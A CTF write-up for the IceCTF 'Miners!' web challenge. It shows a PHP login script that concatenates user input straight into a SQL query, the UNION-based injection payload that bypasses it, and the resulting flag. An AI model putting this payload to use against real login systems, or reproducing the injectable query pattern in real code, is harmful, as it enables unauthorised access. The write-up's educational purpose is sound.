writeups

IceCTF - 65 - Miners! - Web

noraj (Alexandre ZANNI)
, , ,
🇬🇧

Information#

Version#

By Version Comment
noraj 1.0 Creation

CTF#

Description#

The miners website has been working on adding a login portal so that all miners can get the flag, but they haven't made any accounts! However, your boss demands the flag now! Can you get in anyway? miners.vuln.icec.tf

Solution#

  1. Notice that users database is empty!
  2. We have the source code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
include "config.php";
$con = mysqli_connect($MYSQL_HOST, $MYSQL_USER, $MYSQL_PASS, $MYSQL_DB);
$username = $_POST["username"];
$password = $_POST["password"];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($con, $query);

if (mysqli_num_rows($result) !== 1) {
  echo "<h1>Login failed.</h1>";
} else {
  echo "<h1>Logged in!</h1>";
  echo "<p>Your flag is: $FLAG</p>";
}

?>
  1. Even if DB is empty we need the SQL request to generate 1 row: mysqli_num_rows($result) !== 1.
  2. To do that we will use and UNION with a non-empty SELECT request and we'll try to guess number of columns.
  3. Username: ' UNION SELECT 1,2,3 # and Password: random.
  4. Flag: IceCTF{the_miners_union_is_a_strong_one}.

Note: Database is MySQL.

Share